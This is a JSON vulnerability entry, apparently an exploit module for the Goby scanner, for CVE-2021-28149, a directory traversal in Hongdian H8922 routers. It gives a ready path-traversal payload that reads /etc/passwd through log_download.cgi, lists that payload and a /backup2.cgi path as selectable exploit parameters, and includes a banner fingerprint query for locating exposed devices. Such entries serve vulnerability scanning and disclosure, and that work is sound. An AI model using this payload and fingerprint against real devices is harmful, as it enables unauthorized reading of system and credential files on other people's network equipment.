{
"Name": "Hongdian H8922 Arbitrary File Read (CVE-2021-28149)",
"Description": "Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd). This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.",
"Product": "Hongdian-H8922",
"Homepage": "http://en.hongdian.com/Products/Details/H8922",
"DisclosureDate": "2021-05-06",
"Author": "1291904552@qq.com",
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/Hongdian/CVE-2021-28149/Hongdian_H8922_Arbitrary_File_Read_CVE_2021_28149.gif",
"GobyQuery": "banner=\"WWW-Authenticate: Basic realm=\" && banner=\"Server Status\"",
"Level": "2",
"Impact": "<p></p>",
"Recommandation": "",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-28149"
],
"HasExp": true,
"ExpParams": [
{
"name": "filepath",
"type": "createSelect",
"value": "/log_download.cgi?type=../../etc/passwd,/backup2.cgi"
}
],
"ExpTips": null,
"ScanSteps": null,
"ExploitSteps": null,
"Tags": [
"fileread"
],
"CVEIDs": ["CVE-2021-28149"],
"CVSSScore": "6.5",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": ["Hongdian-H8922"]
}
}